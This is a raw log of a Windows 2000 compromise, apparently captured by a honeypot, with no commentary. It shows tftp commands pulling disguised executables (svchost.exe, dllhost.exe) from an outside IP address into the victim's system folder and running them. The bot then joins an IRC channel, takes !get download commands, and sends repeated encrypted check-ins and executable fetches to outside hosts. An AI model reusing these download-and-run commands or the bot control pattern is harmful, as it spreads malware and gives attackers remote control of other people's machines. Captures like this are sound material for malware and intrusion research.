VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> VICTIM: dir wins\\dllhost.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> VICTIM: dir dllcache\\tftpd.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> VICTIM: tftp -i 219.251.77.125 get svchost.exe wins\\SVCHOST.EXE VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\004 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\t VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000& VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000: VICTIM: \000\004\000; VICTIM: \000\004\000< VICTIM: \000\004\000= VICTIM: \000\004\000> VICTIM: \000\004\000? VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000@ VICTIM: \000\004\000A VICTIM: \000\004\000B VICTIM: \000\004\000C VICTIM: \000\004\000D VICTIM: \000\004\000E VICTIM: \000\004\000F VICTIM: \000\004\000G VICTIM: \000\004\000H VICTIM: \000\004\000I VICTIM: \000\004\000J VICTIM: \000\004\000K VICTIM: \000\004\000L VICTIM: \000\004\000M VICTIM: \000\004\000N VICTIM: \000\004\000O VICTIM: \000\004\000P VICTIM: \000\004\000Q VICTIM: \000\004\000R VICTIM: \000\004\000S VICTIM: \000\004\000T VICTIM: \000\004\000U VICTIM: \000\004\000V VICTIM: \000\004\000W VICTIM: \000\004\000X VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000Y VICTIM: \000\004\000Z VICTIM: \000\004\000[ VICTIM: \000\004\000\\ VICTIM: \000\004\000] VICTIM: \000\004\000^ VICTIM: \000\004\000_ VICTIM: \000\004\000` VICTIM: \000\004\000a VICTIM: \000\004\000b VICTIM: \000\004\000c VICTIM: \000\004\000d VICTIM: \000\004\000e VICTIM: \000\004\000f VICTIM: \000\004\000g VICTIM: \000\004\000h VICTIM: \000\004\000i VICTIM: \000\004\000j VICTIM: \000\004\000k VICTIM: Transfer successful: 54544 bytes in 49 seconds, 1113 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: tftp -i 219.251.77.125 get dllhost.exe wins\\DLLHOST.EXE VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: Transfer successful: 19968 bytes in 17 seconds, 1174 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: wins\\DLLHOST.EXE VICTIM: NICK wqfyjhtkUSER y020500 . . :- VICTIM: Service Pack 2JOIN &virtu ATTACKER: :u. PRIVMSG wqfyjhtk :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe:u. PRIVMSG wqfyjhtk :!get http:/mymelanet.com/ml2.txt VICTIM: GET /ml2.txt HTTP/1.0User-Agent: DownloadHost: mymelanet.comPragma: no-cache ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.0940668 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.0940668 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.0940668 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.0940668 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.0940668 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /tm/3387x.exe?t=0.7825281 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mymelanet.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=A5BB56B2059522F6FEE2C79C82C87FC0B37B83B9FBA84ED0D7B5A6EF2DF72B06246E4CA8CFA1BFDF340DF9646C513FD4F40F398C6F1C3514563283F67C0783F14715631507D5A53AE1DBD8A21FF136E9E116FBC68AF4B6B05BF9E28F17EE8AF0ACCDC4DA302B44D9B1025ED9AFAF25BF36C195BAF2B5E0C7B2EB5C333284A11F3137D87310224E8D91A9C29B71B70D89&t=0.6487085 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: GET /sn.php?c=DBC59A7E2EBEF0245B47742FCC86CB74E921B08AABF8B52BD6B4266FD10BEDC07933A34769073B5B82BBE875BB861FF48B70F5405C2F2706F09487F2A2D9A1D3E1B3DFA95B8972EDB58FC5BFBF5146998176CDF0A2DCEAECEA48D9B4EE17F58F3756DFC1514AAE33AA19EC7A33CA2AA211E46937EBB8B587988C9DE832907389E1F174DCD8EB4785576F7F2EB572F476BF63&t=0.9823877 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /tm/crty.exe?t=0.4742395 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mymelanet.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=E2FCA743F8689645BC523C65125901C48E14CAAF9D8302C5E4D0FFBB9F3A5870125B2BC33A056A346C06A2C8818ED3CFBA4D61D98AFF1E4AE683F58DC56CCE50F8AB99EC8C5BA23D447E9FE5FB1517C8E215112C017F2D2B5FFD97FAB74E6E14B2D39B85F1EA2DB072C1AC2B13130C9646B1200F2760C0E79CC5FE912C9A19A79E991ABEB0803CFE615782D3A16633B1&t=0.5658533 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=746A32D658C837E45AB49FC6F8B3E124F66C385D203ED0173A0E7E3A5FFA220A5A131EF6BE818BD5C8A2157F535C9C80639417AF13664612EB8E324AE8419A04B9EAAEDB03D4D24DAD973943749A954A6790407DF8867771BA18A0CD12EBBFC55D3C7E605D466EF3E45773E520D97DF5EF1AEDB323706557A2B6D2A7C163E41E554566C33F0BFF378CBF6E395C9D43C229F3&t=0.4232447 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu